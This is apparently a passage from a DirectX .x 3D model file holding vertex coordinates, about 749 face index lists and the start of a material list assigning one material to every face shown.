0.581259;-0.972652;0.341073;, 0.546491;-0.990521;0.353623;, 0.507333;-0.987672;0.365866;, 0.474275;-0.964868;0.374519;, 0.456178;-0.928220;0.377268;, 0.490606;-0.872552;0.532857;, 0.512679;-0.838287;0.528297;, 0.548973;-0.819719;0.523185;, 0.589762;-0.821821;0.518891;, 0.624118;-0.844029;0.516566;, 0.642834;-0.880395;0.516832;, 0.640894;-0.921171;0.519619;, 0.618822;-0.955436;0.524180;, 0.582528;-0.974003;0.529292;, 0.541739;-0.971901;0.533585;, 0.507384;-0.949693;0.535910;, 0.488667;-0.913328;0.535644;, 0.493711;-0.865320;0.751363;, 0.515861;-0.830881;0.752124;, 0.552249;-0.812092;0.753680;, 0.593129;-0.813988;0.755616;, 0.627541;-0.836061;0.757412;, 0.646271;-0.872395;0.758584;, 0.644296;-0.913256;0.758822;, 0.622147;-0.947696;0.758061;, 0.585759;-0.966485;0.756504;, 0.544880;-0.964589;0.754568;, 0.510466;-0.942518;0.752774;, 0.491738;-0.906182;0.751600;, 0.462107;-0.870287;1.042738;, 0.483959;-0.835894;1.046244;, 0.519896;-0.817176;1.051948;, 0.560295;-0.819147;1.058322;, 0.594324;-0.841279;1.063656;, 0.612870;-0.877643;1.066522;, 0.610960;-0.918495;1.066151;, 0.589108;-0.952886;1.062644;, 0.553171;-0.971606;1.056940;, 0.512774;-0.969635;1.050566;, 0.478744;-0.947501;1.045233;, 0.460198;-0.911138;1.042367;, 0.367008;-0.863932;1.499993;, 0.388748;-0.829532;1.504036;, 0.424386;-0.810795;1.511188;, 0.464373;-0.812738;1.519531;, 0.497993;-0.834844;1.526830;, 0.516241;-0.871188;1.531132;, 0.514224;-0.912031;1.531278;, 0.492484;-0.946432;1.527235;, 0.456846;-0.965170;1.520085;, 0.416860;-0.963226;1.511740;, 0.383239;-0.941120;1.504442;, 0.364993;-0.904777;1.500142;, 0.268967;0.068007;0.013071;, 0.246550;0.042820;0.033669;, 0.233695;0.028375;0.075056;, 0.233843;0.028541;0.126141;, 0.246959;0.043275;0.173238;, 0.269526;0.068630;0.203729;, 0.295496;0.097810;0.209440;, 0.317914;0.122997;0.188843;, 0.330769;0.137443;0.147457;, 0.330618;0.137276;0.096371;, 0.317503;0.122541;0.049272;, 0.294938;0.097187;0.018784;, 0.532598;-0.034434;-0.079687;, 0.523310;-0.071223;-0.064430;, 0.530087;-0.100529;-0.035954;, 0.551115;-0.114505;-0.001888;, 0.580758;-0.109403;0.028642;, 0.611071;-0.086591;0.047454;, 0.633936;-0.052181;0.049506;, 0.643226;-0.015392;0.034251;, 0.636450;0.013916;0.005774;, 0.615423;0.027891;-0.028292;, 0.585781;0.022789;-0.058822;, 0.555464;-0.000024;-0.077633;, 0.650567;-0.148189;-0.285820;, 0.640692;-0.184412;-0.269541;, 0.650740;-0.216872;-0.246779;, 0.678014;-0.236873;-0.223629;, 0.715209;-0.239055;-0.206297;, 0.752357;-0.222831;-0.199428;, 0.779507;-0.192552;-0.204860;, 0.789382;-0.156328;-0.221139;, 0.779335;-0.123867;-0.243903;, 0.752060;-0.103867;-0.267050;, 0.714865;-0.101686;-0.284382;, 0.677716;-0.117909;-0.291252;, 0.703155;-0.249496;-0.459932;, 0.691926;-0.283109;-0.439165;, 0.701936;-0.315499;-0.416282;, 0.730503;-0.337989;-0.397412;, 0.769972;-0.344552;-0.387612;, 0.809769;-0.333430;-0.389508;, 0.839229;-0.307603;-0.402590;, 0.850459;-0.273990;-0.423357;, 0.840448;-0.241600;-0.446241;, 0.811881;-0.219110;-0.465111;, 0.772412;-0.212546;-0.474912;, 0.732615;-0.223669;-0.473016;, 0.698776;-0.346881;-0.589837;, 0.687848;-0.373803;-0.560146;, 0.697968;-0.403695;-0.533928;, 0.726429;-0.428548;-0.518210;, 0.765604;-0.441701;-0.517202;, 0.804994;-0.439631;-0.531172;, 0.834044;-0.422891;-0.556380;, 0.844973;-0.395969;-0.586069;, 0.834851;-0.366078;-0.612287;, 0.806391;-0.341226;-0.628006;, 0.767217;-0.328072;-0.629015;, 0.727827;-0.330142;-0.615044;, 0.646214;-0.446839;-0.666254;, 0.641648;-0.461659;-0.627312;, 0.654973;-0.485459;-0.596437;, 0.682620;-0.511864;-0.581904;, 0.717175;-0.533797;-0.587608;, 0.749384;-0.545383;-0.612017;, 0.770616;-0.543516;-0.648594;, 0.775181;-0.528696;-0.687539;, 0.761856;-0.504896;-0.718411;, 0.734209;-0.478491;-0.732944;, 0.699653;-0.456558;-0.727241;, 0.667444;-0.444972;-0.702831;, 0.562114;-0.540798;-0.681844;, 0.571781;-0.539718;-0.640262;, 0.593885;-0.553708;-0.607760;, 0.622509;-0.579020;-0.593047;, 0.649979;-0.608872;-0.600065;, 0.668932;-0.635264;-0.626931;, 0.674298;-0.651126;-0.666450;, 0.664630;-0.652206;-0.708031;, 0.642525;-0.638216;-0.740533;, 0.613903;-0.612904;-0.755245;, 0.586432;-0.583051;-0.748229;, 0.567477;-0.556659;-0.721362;, 0.465002;-0.623052;-0.614550;, 0.489889;-0.609080;-0.583515;, 0.523147;-0.613624;-0.558743;, 0.555867;-0.635467;-0.546867;, 0.579278;-0.668753;-0.551072;, 0.587111;-0.704567;-0.570232;, 0.577267;-0.733311;-0.599211;, 0.552379;-0.747281;-0.630245;, 0.519121;-0.742738;-0.655018;, 0.486401;-0.720896;-0.666893;, 0.462987;-0.687608;-0.662688;, 0.455154;-0.651795;-0.643529;, 0.378612;-0.697615;-0.443774;, 0.409777;-0.678226;-0.425149;, 0.447904;-0.678569;-0.409999;, 0.482778;-0.698551;-0.402383;, 0.505053;-0.732819;-0.404342;, 0.508764;-0.772191;-0.415352;, 0.492913;-0.806117;-0.432463;, 0.461749;-0.825506;-0.451088;, 0.423623;-0.825164;-0.466239;, 0.388749;-0.805182;-0.473854;, 0.366472;-0.770914;-0.471894;, 0.362761;-0.731541;-0.460883;, 0.321496;-0.737037;-0.257411;, 0.355017;-0.716021;-0.246476;, 0.394615;-0.715348;-0.236123;, 0.429677;-0.735200;-0.229126;, 0.450813;-0.770255;-0.227361;, 0.452355;-0.811122;-0.231301;, 0.433895;-0.846851;-0.239889;, 0.400373;-0.867868;-0.250826;, 0.360775;-0.868539;-0.261179;, 0.325712;-0.848687;-0.268175;, 0.304578;-0.813632;-0.269939;, 0.303034;-0.772765;-0.265999;, 0.286201;-0.737902;-0.093081;, 0.320702;-0.716861;-0.086710;, 0.360835;-0.716176;-0.078848;, 0.395844;-0.736028;-0.071600;, 0.416351;-0.771101;-0.066910;, 0.416861;-0.811993;-0.066035;, 0.397235;-0.847750;-0.069207;, 0.362732;-0.868790;-0.075580;, 0.322603;-0.869475;-0.083443;, 0.287591;-0.849623;-0.090689;, 0.267085;-0.814551;-0.095380;, 0.266577;-0.773658;-0.096255;, 0.253509;-0.729988;0.090755;, 0.288662;-0.709106;0.093465;, 0.329494;-0.708591;0.097392;, 0.365065;-0.728578;0.101484;, 0.385843;-0.763717;0.104645;, 0.386261;-0.804586;0.106028;, 0.366209;-0.840241;0.105260;, 0.331057;-0.861123;0.102552;, 0.290226;-0.861638;0.098624;, 0.254654;-0.841650;0.094531;, 0.233877;-0.806513;0.091370;, 0.233457;-0.765642;0.089990;, 0.250541;-0.725927;0.269031;, 0.285800;-0.705192;0.265268;, 0.326768;-0.704863;0.260983;, 0.362468;-0.725029;0.257322;, 0.383334;-0.760284;0.255268;, 0.383775;-0.801184;0.255371;, 0.363672;-0.836769;0.257604;, 0.328413;-0.857504;0.261366;, 0.287443;-0.857834;0.265652;, 0.251743;-0.837668;0.269313;, 0.230879;-0.802411;0.271367;, 0.230437;-0.761513;0.271263;, 0.286016;-0.728406;0.423999;, 0.319713;-0.707562;0.413405;, 0.358699;-0.707095;0.400455;, 0.392527;-0.727129;0.388618;, 0.412133;-0.762296;0.381065;, 0.412263;-0.803175;0.379822;, 0.392887;-0.838810;0.385220;, 0.359190;-0.859654;0.395814;, 0.320206;-0.860122;0.408764;, 0.286377;-0.840087;0.420600;, 0.266771;-0.804920;0.428154;, 0.266638;-0.764040;0.429396;, 0.346828;-0.734390;0.561247;, 0.377271;-0.713226;0.543308;, 0.412340;-0.712374;0.521521;, 0.442640;-0.732061;0.501723;, 0.460053;-0.767013;0.489219;, 0.459913;-0.807865;0.487360;, 0.442256;-0.843670;0.496644;, 0.411816;-0.864834;0.514584;, 0.376746;-0.865688;0.536372;, 0.346445;-0.845999;0.556169;, 0.329031;-0.811047;0.568673;, 0.329173;-0.770196;0.570532;, 0.431292;-0.739689;0.662260;, 0.458877;-0.718345;0.640905;, 0.490474;-0.717275;0.614965;, 0.517619;-0.736763;0.591391;, 0.533035;-0.771590;0.576500;, 0.532594;-0.812424;0.574282;, 0.516412;-0.848320;0.585329;, 0.488828;-0.869664;0.606683;, 0.457230;-0.870734;0.632625;, 0.430086;-0.851246;0.656198;, 0.414668;-0.816419;0.671088;, 0.415110;-0.775586;0.673307;, 0.496344;-0.745623;0.742559;, 0.528672;-0.724712;0.727058;, 0.565346;-0.724105;0.707383;, 0.596537;-0.743963;0.688807;, 0.613889;-0.778966;0.676304;, 0.612751;-0.819736;0.673227;, 0.593431;-0.855348;0.680400;, 0.561104;-0.876258;0.695900;, 0.524430;-0.876866;0.715576;, 0.493241;-0.857007;0.734153;, 0.475888;-0.822004;0.746656;, 0.477024;-0.781234;0.749733;, 0.523287;-0.754504;0.827943;, 0.559406;-0.734842;0.824459;, 0.600241;-0.735607;0.817971;, 0.634849;-0.756591;0.810221;, 0.653956;-0.792173;0.803283;, 0.652443;-0.832819;0.799017;, 0.630718;-0.867638;0.798564;, 0.594599;-0.887298;0.802049;, 0.553765;-0.886535;0.808536;, 0.519156;-0.865550;0.816288;, 0.500049;-0.829968;0.823226;, 0.501561;-0.789321;0.827491;, 0.523778;-0.765882;0.924957;, 0.559939;-0.747191;0.929730;, 0.600822;-0.749087;0.932901;, 0.635475;-0.771065;0.933619;, 0.654607;-0.807236;0.931695;, 0.653095;-0.847907;0.927641;, 0.631347;-0.882181;0.922545;, 0.595182;-0.900872;0.917773;, 0.554301;-0.898976;0.914601;, 0.519650;-0.876998;0.913882;, 0.500518;-0.840827;0.915808;, 0.502028;-0.800156;0.919861;, 0.491330;-0.780336;1.115789;, 0.526957;-0.761882;1.123704;, 0.567091;-0.764110;1.131266;, 0.600986;-0.786427;1.136449;, 0.619550;-0.822850;1.137864;, 0.617813;-0.863621;1.135131;, 0.596242;-0.897815;1.128983;, 0.560615;-0.916269;1.121068;, 0.520479;-0.914038;1.113506;, 0.486587;-0.891722;1.108324;, 0.468020;-0.855300;1.106909;, 0.469757;-0.814529;1.109640;, 0.392454;-0.799738;1.579013;, 0.427986;-0.781303;1.587370;, 0.467937;-0.783568;1.595802;, 0.501602;-0.805928;1.602051;, 0.519958;-0.842393;1.604442;, 0.518089;-0.883190;1.602335;, 0.496495;-0.917387;1.596294;, 0.460960;-0.935823;1.587935;, 0.421011;-0.933557;1.579504;, 0.387348;-0.911198;1.573254;, 0.368989;-0.874733;1.570863;, 0.370860;-0.833936;1.572971;; 749; 4;113,101,100,112;, 4;112,100,99,111;, 4;124,112,111,123;, 4;125,113,112,124;, 4;114,102,113,125;, 4;102,90,101,113;, 4;103,91,90,102;, 4;115,103,102,114;, 4;116,104,103,115;, 4;104,92,91,103;, 4;92,80,79,91;, 4;91,79,78,90;, 4;90,78,89,101;, 4;101,89,88,100;, 4;100,88,87,99;, 4;99,87,86,98;, 4;98,86,85,97;, 4;110,98,97,109;, 4;122,110,109,121;, 4;123,111,110,122;, 4;111,99,98,110;, 4;109,97,96,108;, 4;121,109,108,120;, 4;133,121,120,132;, 4;132,120,119,131;, 4;131,119,118,130;, 4;130,118,117,129;, 4;129,117,116,128;, 4;128,116,115,127;, 4;127,115,114,126;, 4;126,114,125,137;, 4;137,125,124,136;, 4;136,124,123,135;, 4;135,123,122,134;, 4;134,122,121,133;, 4;146,134,133,145;, 4;147,135,134,146;, 4;148,136,135,147;, 4;149,137,136,148;, 4;138,126,137,149;, 4;139,127,126,138;, 4;140,128,127,139;, 4;141,129,128,140;, 4;142,130,129,141;, 4;143,131,130,142;, 4;144,132,131,143;, 4;145,133,132,144;, 4;157,145,144,156;, 4;156,144,143,155;, 4;155,143,142,154;, 4;154,142,141,153;, 4;153,141,140,152;, 4;152,140,139,151;, 4;151,139,138,150;, 4;150,138,149,161;, 4;161,149,148,160;, 4;160,148,147,159;, 4;159,147,146,158;, 4;158,146,145,157;, 4;170,158,157,169;, 4;171,159,158,170;, 4;172,160,159,171;, 4;173,161,160,172;, 4;162,150,161,173;, 4;163,151,150,162;, 4;164,152,151,163;, 4;165,153,152,164;, 4;166,154,153,165;, 4;167,155,154,166;, 4;168,156,155,167;, 4;169,157,156,168;, 4;181,169,168,180;, 4;182,170,169,181;, 4;183,171,170,182;, 4;184,172,171,183;, 4;185,173,172,184;, 4;174,162,173,185;, 4;175,163,162,174;, 4;176,164,163,175;, 4;177,165,164,176;, 4;178,166,165,177;, 4;179,167,166,178;, 4;180,168,167,179;, 4;192,180,179,191;, 4;193,181,180,192;, 4;194,182,181,193;, 4;195,183,182,194;, 4;196,184,183,195;, 4;197,185,184,196;, 4;186,174,185,197;, 4;187,175,174,186;, 4;188,176,175,187;, 4;189,177,176,188;, 4;190,178,177,189;, 4;191,179,178,190;, 4;203,191,190,202;, 4;204,192,191,203;, 4;205,193,192,204;, 4;206,194,193,205;, 4;207,195,194,206;, 4;208,196,195,207;, 4;209,197,196,208;, 4;198,186,197,209;, 4;199,187,186,198;, 4;200,188,187,199;, 4;201,189,188,200;, 4;202,190,189,201;, 4;214,202,201,213;, 4;215,203,202,214;, 4;216,204,203,215;, 4;217,205,204,216;, 4;218,206,205,217;, 4;219,207,206,218;, 4;220,208,207,219;, 4;221,209,208,220;, 4;210,198,209,221;, 4;211,199,198,210;, 4;212,200,199,211;, 4;213,201,200,212;, 4;225,213,212,224;, 4;226,214,213,225;, 4;227,215,214,226;, 4;228,216,215,227;, 4;229,217,216,228;, 4;230,218,217,229;, 4;231,219,218,230;, 4;232,220,219,231;, 4;233,221,220,232;, 4;222,210,221,233;, 4;223,211,210,222;, 4;224,212,211,223;, 4;236,224,223,235;, 4;235,223,222,234;, 4;234,222,233,245;, 4;245,233,232,244;, 4;244,232,231,243;, 4;243,231,230,242;, 4;242,230,229,241;, 4;241,229,228,240;, 4;240,228,227,239;, 4;239,227,226,238;, 4;238,226,225,237;, 4;237,225,224,236;, 4;249,237,236,248;, 4;248,236,235,247;, 4;247,235,234,246;, 4;246,234,245,257;, 4;257,245,244,256;, 4;256,244,243,255;, 4;255,243,242,254;, 4;254,242,241,253;, 4;253,241,240,252;, 4;252,240,239,251;, 4;251,239,238,250;, 4;250,238,237,249;, 4;262,250,249,261;, 4;263,251,250,262;, 4;264,252,251,263;, 4;265,253,252,264;, 4;266,254,253,265;, 4;267,255,254,266;, 4;268,256,255,267;, 4;269,257,256,268;, 4;258,246,257,269;, 4;259,247,246,258;, 4;260,248,247,259;, 4;261,249,248,260;, 4;273,261,260,272;, 4;272,260,259,271;, 4;271,259,258,270;, 4;270,258,269,281;, 4;281,269,268,280;, 4;280,268,267,279;, 4;279,267,266,278;, 4;278,266,265,277;, 4;277,265,264,276;, 4;276,264,263,275;, 4;275,263,262,274;, 4;274,262,261,273;, 4;49,37,36,48;, 4;48,36,35,47;, 4;47,35,34,46;, 4;59,47,46,58;, 4;60,48,47,59;, 4;61,49,48,60;, 4;62,50,49,61;, 4;63,51,50,62;, 4;64,52,51,63;, 4;65,53,52,64;, 4;54,42,53,65;, 4;55,43,42,54;, 4;56,44,43,55;, 4;44,32,31,43;, 4;43,31,30,42;, 4;42,30,41,53;, 4;53,41,40,52;, 4;52,40,39,51;, 4;51,39,38,50;, 4;50,38,37,49;, 4;46,34,33,45;, 4;58,46,45,57;, 4;57,45,44,56;, 4;45,33,32,44;, 4;69,57,56,68;, 4;68,56,55,67;, 4;67,55,54,66;, 4;66,54,65,77;, 4;77,65,64,76;, 4;76,64,63,75;, 4;75,63,62,74;, 4;74,62,61,73;, 4;73,61,60,72;, 4;72,60,59,71;, 4;71,59,58,70;, 4;70,58,57,69;, 4;82,70,69,81;, 4;83,71,70,82;, 4;84,72,71,83;, 4;85,73,72,84;, 4;86,74,73,85;, 4;87,75,74,86;, 4;88,76,75,87;, 4;89,77,76,88;, 4;78,66,77,89;, 4;79,67,66,78;, 4;80,68,67,79;, 4;81,69,68,80;, 4;93,81,80,92;, 4;105,93,92,104;, 4;117,105,104,116;, 4;118,106,105,117;, 4;106,94,93,105;, 4;107,95,94,106;, 4;119,107,106,118;, 4;120,108,107,119;, 4;108,96,95,107;, 4;96,84,83,95;, 4;95,83,82,94;, 4;94,82,81,93;, 4;97,85,84,96;, 4;9,3,4,5;, 4;8,2,3,9;, 5;3,2,1,0,4;, 4;5,4,0,6;, 12;41,30,31,32,33,34,35,36,37,38,39,40;, 4;18,12,13,19;, 4;19,13,14,15;, 5;13,12,11,10,14;, 4;15,14,10,16;, 12;293,282,283,284,285,286,287,288,289,290,291,292;, 5;22,21,20,24,23;, 4;27,21,22,28;, 4;28,22,23,29;, 5;27,28,29,25,26;, 4;29,23,24,25;, 12;545,534,535,536,537,538,539,540,541,542,543,544;, 12;523,522,533,532,531,530,529,528,527,526,525,524;, 12;775,774,785,784,783,782,781,780,779,778,777,776;, 12;271,270,281,280,279,278,277,276,275,274,273,272;, 4;365,353,352,364;, 4;364,352,351,363;, 4;376,364,363,375;, 4;377,365,364,376;, 4;366,354,365,377;, 4;354,342,353,365;, 4;355,343,342,354;, 4;367,355,354,366;, 4;368,356,355,367;, 4;356,344,343,355;, 4;344,332,331,343;, 4;345,333,332,344;, 4;346,334,333,345;, 4;347,335,334,346;, 4;359,347,346,358;, 4;371,359,358,370;, 4;370,358,357,369;, 4;358,346,345,357;, 4;357,345,344,356;, 4;369,357,356,368;, 4;381,369,368,380;, 4;382,370,369,381;, 4;383,371,370,382;, 4;384,372,371,383;, 4;385,373,372,384;, 4;386,374,373,385;, 4;387,375,374,386;, 4;388,376,375,387;, 4;389,377,376,388;, 4;378,366,377,389;, 4;379,367,366,378;, 4;380,368,367,379;, 4;392,380,379,391;, 4;393,381,380,392;, 4;394,382,381,393;, 4;395,383,382,394;, 4;396,384,383,395;, 4;397,385,384,396;, 4;398,386,385,397;, 4;399,387,386,398;, 4;400,388,387,399;, 4;401,389,388,400;, 4;390,378,389,401;, 4;391,379,378,390;, 4;403,391,390,402;, 4;402,390,401,413;, 4;413,401,400,412;, 4;412,400,399,411;, 4;411,399,398,410;, 4;410,398,397,409;, 4;409,397,396,408;, 4;408,396,395,407;, 4;407,395,394,406;, 4;406,394,393,405;, 4;405,393,392,404;, 4;404,392,391,403;, 4;416,404,403,415;, 4;415,403,402,414;, 4;414,402,413,425;, 4;425,413,412,424;, 4;424,412,411,423;, 4;423,411,410,422;, 4;422,410,409,421;, 4;421,409,408,420;, 4;420,408,407,419;, 4;419,407,406,418;, 4;418,406,405,417;, 4;417,405,404,416;, 4;429,417,416,428;, 4;430,418,417,429;, 4;431,419,418,430;, 4;432,420,419,431;, 4;433,421,420,432;, 4;434,422,421,433;, 4;435,423,422,434;, 4;436,424,423,435;, 4;437,425,424,436;, 4;426,414,425,437;, 4;427,415,414,426;, 4;428,416,415,427;, 4;440,428,427,439;, 4;439,427,426,438;, 4;438,426,437,449;, 4;449,437,436,448;, 4;448,436,435,447;, 4;447,435,434,446;, 4;446,434,433,445;, 4;445,433,432,444;, 4;444,432,431,443;, 4;443,431,430,442;, 4;442,430,429,441;, 4;441,429,428,440;, 4;453,441,440,452;, 4;454,442,441,453;, 4;455,443,442,454;, 4;456,444,443,455;, 4;457,445,444,456;, 4;458,446,445,457;, 4;459,447,446,458;, 4;460,448,447,459;, 4;461,449,448,460;, 4;450,438,449,461;, 4;451,439,438,450;, 4;452,440,439,451;, 4;464,452,451,463;, 4;463,451,450,462;, 4;462,450,461,473;, 4;473,461,460,472;, 4;472,460,459,471;, 4;471,459,458,470;, 4;470,458,457,469;, 4;469,457,456,468;, 4;468,456,455,467;, 4;467,455,454,466;, 4;466,454,453,465;, 4;465,453,452,464;, 4;477,465,464,476;, 4;478,466,465,477;, 4;479,467,466,478;, 4;480,468,467,479;, 4;481,469,468,480;, 4;482,470,469,481;, 4;483,471,470,482;, 4;484,472,471,483;, 4;485,473,472,484;, 4;474,462,473,485;, 4;475,463,462,474;, 4;476,464,463,475;, 4;488,476,475,487;, 4;489,477,476,488;, 4;490,478,477,489;, 4;491,479,478,490;, 4;492,480,479,491;, 4;493,481,480,492;, 4;494,482,481,493;, 4;495,483,482,494;, 4;496,484,483,495;, 4;497,485,484,496;, 4;486,474,485,497;, 4;487,475,474,486;, 4;499,487,486,498;, 4;498,486,497,509;, 4;509,497,496,508;, 4;508,496,495,507;, 4;507,495,494,506;, 4;506,494,493,505;, 4;505,493,492,504;, 4;504,492,491,503;, 4;503,491,490,502;, 4;502,490,489,501;, 4;501,489,488,500;, 4;500,488,487,499;, 4;512,500,499,511;, 4;511,499,498,510;, 4;510,498,509,521;, 4;521,509,508,520;, 4;520,508,507,519;, 4;519,507,506,518;, 4;518,506,505,517;, 4;517,505,504,516;, 4;516,504,503,515;, 4;515,503,502,514;, 4;514,502,501,513;, 4;513,501,500,512;, 4;525,513,512,524;, 4;524,512,511,523;, 4;523,511,510,522;, 4;522,510,521,533;, 4;533,521,520,532;, 4;532,520,519,531;, 4;531,519,518,530;, 4;530,518,517,529;, 4;529,517,516,528;, 4;528,516,515,527;, 4;527,515,514,526;, 4;526,514,513,525;, 4;300,288,287,299;, 4;301,289,288,300;, 4;302,290,289,301;, 4;303,291,290,302;, 4;304,292,291,303;, 4;305,293,292,304;, 4;294,282,293,305;, 4;295,283,282,294;, 4;296,284,283,295;, 4;297,285,284,296;, 4;298,286,285,297;, 4;299,287,286,298;, 4;311,299,298,310;, 4;312,300,299,311;, 4;313,301,300,312;, 4;314,302,301,313;, 4;315,303,302,314;, 4;316,304,303,315;, 4;317,305,304,316;, 4;306,294,305,317;, 4;307,295,294,306;, 4;308,296,295,307;, 4;309,297,296,308;, 4;310,298,297,309;, 4;322,310,309,321;, 4;323,311,310,322;, 4;324,312,311,323;, 4;325,313,312,324;, 4;326,314,313,325;, 4;327,315,314,326;, 4;328,316,315,327;, 4;329,317,316,328;, 4;318,306,317,329;, 4;319,307,306,318;, 4;320,308,307,319;, 4;321,309,308,320;, 4;333,321,320,332;, 4;334,322,321,333;, 4;335,323,322,334;, 4;336,324,323,335;, 4;337,325,324,336;, 4;338,326,325,337;, 4;339,327,326,338;, 4;340,328,327,339;, 4;341,329,328,340;, 4;330,318,329,341;, 4;331,319,318,330;, 4;332,320,319,331;, 4;343,331,330,342;, 4;342,330,341,353;, 4;353,341,340,352;, 4;352,340,339,351;, 4;351,339,338,350;, 4;350,338,337,349;, 4;349,337,336,348;, 4;361,349,348,360;, 4;373,361,360,372;, 4;374,362,361,373;, 4;362,350,349,361;, 4;363,351,350,362;, 4;375,363,362,374;, 4;372,360,359,371;, 4;360,348,347,359;, 4;348,336,335,347;, 4;7,8,9,5;, 3;7,5,6;, 4;7,1,2,8;, 4;6,0,1,7;, 4;616,604,603,615;, 4;615,603,602,614;, 4;627,615,614,626;, 4;628,616,615,627;, 4;629,617,616,628;, 4;617,605,604,616;, 4;605,593,592,604;, 4;604,592,591,603;, 4;603,591,590,602;, 4;602,590,589,601;, 4;614,602,601,613;, 4;626,614,613,625;, 4;625,613,612,624;, 4;613,601,600,612;, 4;601,589,588,600;, 4;600,588,587,599;, 4;612,600,599,611;, 4;624,612,611,623;, 4;623,611,610,622;, 4;611,599,598,610;, 4;599,587,586,598;, 4;598,586,585,597;, 4;597,585,584,596;, 4;609,597,596,608;, 4;621,609,608,620;, 4;622,610,609,621;, 4;610,598,597,609;, 4;596,584,583,595;, 4;608,596,595,607;, 4;620,608,607,619;, 4;619,607,606,618;, 4;607,595,594,606;, 4;595,583,582,594;, 4;594,582,593,605;, 4;606,594,605,617;, 4;618,606,617,629;, 4;630,618,629,641;, 4;641,629,628,640;, 4;640,628,627,639;, 4;639,627,626,638;, 4;638,626,625,637;, 4;637,625,624,636;, 4;636,624,623,635;, 4;635,623,622,634;, 4;634,622,621,633;, 4;633,621,620,632;, 4;632,620,619,631;, 4;631,619,618,630;, 4;643,631,630,642;, 4;642,630,641,653;, 4;653,641,640,652;, 4;652,640,639,651;, 4;651,639,638,650;, 4;650,638,637,649;, 4;649,637,636,648;, 4;648,636,635,647;, 4;647,635,634,646;, 4;646,634,633,645;, 4;645,633,632,644;, 4;644,632,631,643;, 4;656,644,643,655;, 4;657,645,644,656;, 4;658,646,645,657;, 4;659,647,646,658;, 4;660,648,647,659;, 4;661,649,648,660;, 4;662,650,649,661;, 4;663,651,650,662;, 4;664,652,651,663;, 4;665,653,652,664;, 4;654,642,653,665;, 4;655,643,642,654;, 4;667,655,654,666;, 4;666,654,665,677;, 4;677,665,664,676;, 4;676,664,663,675;, 4;675,663,662,674;, 4;674,662,661,673;, 4;673,661,660,672;, 4;672,660,659,671;, 4;671,659,658,670;, 4;670,658,657,669;, 4;669,657,656,668;, 4;668,656,655,667;, 4;680,668,667,679;, 4;679,667,666,678;, 4;678,666,677,689;, 4;689,677,676,688;, 4;688,676,675,687;, 4;687,675,674,686;, 4;686,674,673,685;, 4;685,673,672,684;, 4;684,672,671,683;, 4;683,671,670,682;, 4;682,670,669,681;, 4;681,669,668,680;, 4;693,681,680,692;, 4;694,682,681,693;, 4;695,683,682,694;, 4;696,684,683,695;, 4;697,685,684,696;, 4;698,686,685,697;, 4;699,687,686,698;, 4;700,688,687,699;, 4;701,689,688,700;, 4;690,678,689,701;, 4;691,679,678,690;, 4;692,680,679,691;, 4;704,692,691,703;, 4;705,693,692,704;, 4;706,694,693,705;, 4;707,695,694,706;, 4;708,696,695,707;, 4;709,697,696,708;, 4;710,698,697,709;, 4;711,699,698,710;, 4;712,700,699,711;, 4;713,701,700,712;, 4;702,690,701,713;, 4;703,691,690,702;, 4;715,703,702,714;, 4;714,702,713,725;, 4;725,713,712,724;, 4;724,712,711,723;, 4;723,711,710,722;, 4;722,710,709,721;, 4;721,709,708,720;, 4;720,708,707,719;, 4;719,707,706,718;, 4;718,706,705,717;, 4;717,705,704,716;, 4;716,704,703,715;, 4;728,716,715,727;, 4;729,717,716,728;, 4;730,718,717,729;, 4;731,719,718,730;, 4;732,720,719,731;, 4;733,721,720,732;, 4;734,722,721,733;, 4;735,723,722,734;, 4;736,724,723,735;, 4;737,725,724,736;, 4;726,714,725,737;, 4;727,715,714,726;, 4;739,727,726,738;, 4;738,726,737,749;, 4;749,737,736,748;, 4;748,736,735,747;, 4;747,735,734,746;, 4;746,734,733,745;, 4;745,733,732,744;, 4;744,732,731,743;, 4;743,731,730,742;, 4;742,730,729,741;, 4;741,729,728,740;, 4;740,728,727,739;, 4;752,740,739,751;, 4;751,739,738,750;, 4;750,738,749,761;, 4;761,749,748,760;, 4;760,748,747,759;, 4;759,747,746,758;, 4;758,746,745,757;, 4;757,745,744,756;, 4;756,744,743,755;, 4;755,743,742,754;, 4;754,742,741,753;, 4;753,741,740,752;, 4;765,753,752,764;, 4;766,754,753,765;, 4;767,755,754,766;, 4;768,756,755,767;, 4;769,757,756,768;, 4;770,758,757,769;, 4;771,759,758,770;, 4;772,760,759,771;, 4;773,761,760,772;, 4;762,750,761,773;, 4;763,751,750,762;, 4;764,752,751,763;, 4;776,764,763,775;, 4;777,765,764,776;, 4;778,766,765,777;, 4;779,767,766,778;, 4;780,768,767,779;, 4;781,769,768,780;, 4;782,770,769,781;, 4;783,771,770,782;, 4;784,772,771,783;, 4;785,773,772,784;, 4;774,762,773,785;, 4;775,763,762,774;, 4;552,540,539,551;, 4;553,541,540,552;, 4;554,542,541,553;, 4;555,543,542,554;, 4;556,544,543,555;, 4;557,545,544,556;, 4;546,534,545,557;, 4;547,535,534,546;, 4;548,536,535,547;, 4;549,537,536,548;, 4;550,538,537,549;, 4;551,539,538,550;, 4;563,551,550,562;, 4;564,552,551,563;, 4;565,553,552,564;, 4;566,554,553,565;, 4;567,555,554,566;, 4;568,556,555,567;, 4;569,557,556,568;, 4;558,546,557,569;, 4;559,547,546,558;, 4;560,548,547,559;, 4;561,549,548,560;, 4;562,550,549,561;, 4;574,562,561,573;, 4;575,563,562,574;, 4;576,564,563,575;, 4;577,565,564,576;, 4;578,566,565,577;, 4;579,567,566,578;, 4;580,568,567,579;, 4;581,569,568,580;, 4;570,558,569,581;, 4;571,559,558,570;, 4;572,560,559,571;, 4;573,561,560,572;, 4;585,573,572,584;, 4;586,574,573,585;, 4;587,575,574,586;, 4;588,576,575,587;, 4;589,577,576,588;, 4;590,578,577,589;, 4;591,579,578,590;, 4;592,580,579,591;, 4;593,581,580,592;, 4;582,570,581,593;, 4;583,571,570,582;, 4;584,572,571,583;, 4;17,18,19,15;, 3;17,15,16;, 4;17,11,12,18;, 4;16,10,11,17;, 4;26,20,21,27;, 4;25,24,20,26;; MeshMaterialList { 1; 749; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 